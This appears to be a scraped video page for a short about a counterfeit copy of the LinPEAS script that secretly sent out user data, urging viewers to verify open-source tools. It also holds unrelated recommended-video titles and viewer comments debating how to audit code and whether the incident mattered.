Why You MUST Audit Open Source Tools Before Use

preview_player
Показать описание
Last week, a counterfeit version of the widely used open-source script LinPEAS was found to contain a hidden remote logging feature. This discovery highlights a critical lesson for developers and organizations alike: always verify open-source tools and scripts, ensuring they come from trusted, original sources.

In this short, Andrew Bellini dives into the technical details behind this incident and shares actionable insights to help your team stay secure when using open-source software.

Stay informed and safeguard your workflows-watch now!

#linpeas #infosec #hacking #opensource #shorts

Our Linux courses in the TCM Security Academy include:

📱Social Media📱
___________________________________________

💸Donate💸
___________________________________________
Like the channel? Please consider supporting me on Patreon:

Hacker Books:

My Build:

My Recording Equipment:

  1. The Cyber Mentor
  2. 1985 song
  3. 3d animation
  4. agile project management
  5. asmr
  6. caves of qud mods
Рекомендации по теме
Why You MUST 0:02:59

Why You MUST Audit Open Source Tools Before Use

You like my 0:00:06

You like my customized nails?! 🤑#customizednails #trends #nails

Audit Opening Meeting 0:10:12

Audit Opening Meeting

When You're Elon 0:00:23

When You're Elon Musk You Don't Need a Business Plan - @MindMasteryX

COCKY cop eats 0:01:00

COCKY cop eats CONCRETE CROW!! First amendment audit 2023 #firstamendmentaudit #proveallthingsaudits

Case DISMISSED in 0:00:34

Case DISMISSED in 34 SECONDS!

Best AI Tools 0:00:24

Best AI Tools You Need to Know! (Free & Paid)

5 Resume Mistakes 0:06:41

5 Resume Mistakes You MUST Avoid (with real examples)!

My very first 0:01:01

My very first - First Amendment Audit - I visit the people that visit us at home to see the reaction

Can You Explain 0:00:54

Can You Explain That To Mr. McDuffy That Open Carry Fishing Is Legal

Unlock Administrator Privileges 0:00:22

Unlock Administrator Privileges on Windows Instantly! #windows #tech #computer #microsoft

Harsh Reality of 0:00:49

Harsh Reality of Corporate Jobs | Corporate Reality | Corporate Life | Toxic Work | Office Politics

Audit and Auditors 0:00:42

Audit and Auditors #companies #cainter #caintermediate

How to deliver 0:00:36

How to deliver a killer presentation

Why The Stock 0:00:26

Why The Stock Market Will Never Make You Rich

5 Top Skills 0:04:37

5 Top Skills for Accountants in 2025 | How to be an Accountant & Successful in Business World?

Disable This Android 0:00:29

Disable This Android Privacy Setting ASAP!

9 Most Common 0:00:06

9 Most Common Job Interview Questions and Answers

Open AudIT - 0:04:25

Open AudIT - Using Discovery

#trending Meesho finds 0:00:18

#trending Meesho finds Every girls must have product #meesho #ytshorts

Excel Tips You 0:00:30

Excel Tips You NEVER Knew!

Someone Finally Walked 1:38:03

Someone Finally Walked Off Financial Audit

The only downside 0:01:01

The only downside to being an accountant #tax #accountant #accounting

3 THINGS TO 0:00:53

3 THINGS TO NEVER SAY in a JOB INTERVIEW! Interview Tips! #interviewtips #mindset

Комментарии
Автор

How do i verify or Audit open source softwares?

mohammadkamrul
Автор

First video I saw from you and subbed.
Very rare for me. Masterfully explained.

smreha
Автор

Very interesting, thanks. Although I found the background music is too loud and distracting.

datasilouk
Автор

His keyboard sounds are really soothing

xbazka
Автор

The companies I work for require me todo that. If I use a open source library in code or a plugin in an ide or so. I have to sign with my blood and soul that this is trusted.

We also fork open source code so that no random new stuff might get injected and so on.

Pain in the ass but secure.

KDSBestGameDev
Автор

This short cured my depression literally it motivates me to keep going

naesone
Автор

On scripts I also glance over them. But open source software is too much. Most opensource tools are too big to check all lines of code.

redcrafterlppa
Автор

What's the point in collecting that data specifically? Username and hostname etc. like what value does that really have?

deano_sk
Автор

Why would you click that one though when the github one is right under

duarteribeiro
Автор

Exactly why linux is not a good desktop for regular users but power users / servers only.

sale
Автор

so what's wrong with it? there no any sensitive data it. why this example shows i need to to audit open source?

respise
Автор

Can anybody explain how this information is useful for the one who receives it?

sharathkumark
Автор

Nothing "sketchy" about it. They've built automatic reporting into an audit tool. It is smart. Instead of crying foul you should modify it to send the reporting to an in-house repository so that you will automatically have it for inclusion in your final report or to be used in a follow-up tool.
Often I will break down the work required to produce an intended result into a series of tasks. I'll script each task separately and save the output as input for the next task. I do this because many solutions break down to tasks that are common to other solutions. I then have what I need to chain calls to these scripts into various solutions.
To claim that an open source tool provider is surreptitously gathering data for nefarious purpose is absurd. It is open source. Their user base can cat the script and easily recognize http transacts as it flies by on the console, if they can't they're probably in the wrong profession. I'm not sorry to call this out as a false alarm intended to generate views.

DanielKreimendahl
Автор

i am a simple user i vm everything i do not trust if it performs fine in a vm then its life will be in a vm

ProtoType
visit shbcf.ru